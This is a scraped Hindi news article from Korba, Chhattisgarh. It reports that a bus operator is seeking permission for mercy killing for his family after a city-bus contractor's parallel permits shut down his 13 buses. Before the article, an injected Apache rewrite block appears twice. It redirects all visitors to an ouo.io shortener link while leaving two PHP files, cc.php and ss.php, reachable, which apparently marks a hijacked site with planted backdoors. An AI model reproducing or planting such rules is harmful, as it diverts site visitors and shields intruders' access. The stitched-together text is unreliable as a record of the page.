
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 347
Previous Nextकोरबा। अपनी समस्याओं के निवारण के लिए बार—बार आवेदन देकर थक चुके छत्तीसगढ़ के कोरबा जिले के परिवहन व्यवसायी बृजेश त्रिपाठी ने मुख्यमंत्री से परिवार समेत इच्छा मृत्यु की मांग की है।
जानकारी के अनुसार परिवहन व्यवसायी बृजेश त्रिपाठी करीब 2 दशक से यात्री बसों का संचालन कर रहा है। उसके परिवार में पत्नी, 1 पुत्र और 2 बेटियां हैं. बृजेश त्रिपाठी की दुश्वारियां दो वर्ष पूर्व शुरू हुई, जब छत्तीसगढ़ शासन ने जन सुविधा के लिए सिटी बस संचालन की योजना बनाई थी। कोरबा में भी कोरबा अरबन पब्लिक ट्रांसपोर्ट सोसायटी बनाकर सिटी बस का संचालन प्रारंभ किया गया। सिटी बस संचालन का ठेका दुरगम्बा ट्रासपोर्ट नामक एक निजी कंपनी को दिया गया। निजी ठेका कंपनी ने कोरबा-मड़वारानी-चांपा मार्ग पर परमिट के लिए आवेदन किया। हालांकि इस मार्ग पर कोई भी समय अंतराल उपलब्ध नहीं था। निजी बसों का पूरे समय संचालन हो रहा था। लिहाजा, निजी बस संचालकों ने आपत्ति दर्ज जताई, लेकिन परिवहन विभाग ने उनकी सुनवाई नहीं की। बल्कि निजी बसों के समय पर सिटी बसों के लिए समानान्तर परमिट जारी कर दिया गया। बृजेश त्रिपाठी के अनुसार इसके बाद सिटी बस ठेकेदार ने निजी बसों के आगे-आगे बलपूर्वक सिटी बस का संचालन शुरू कर दिया। नतीजतन निजी बसें एक-एक कर बंद होने लगी। सिटी बस संचालक ठेकेदार की गैरकानूनी गतिविधियों की शिकायतों को प्रशासन ने हमेशा अनसुना कर दिया। बृजेश त्रिपाठी की 13 यात्री बसें बंद हो गईं। अब बृजेश त्रिपाठी के सामने अपने परिवार के भरण पोषण की समस्या पैदा हो गई है।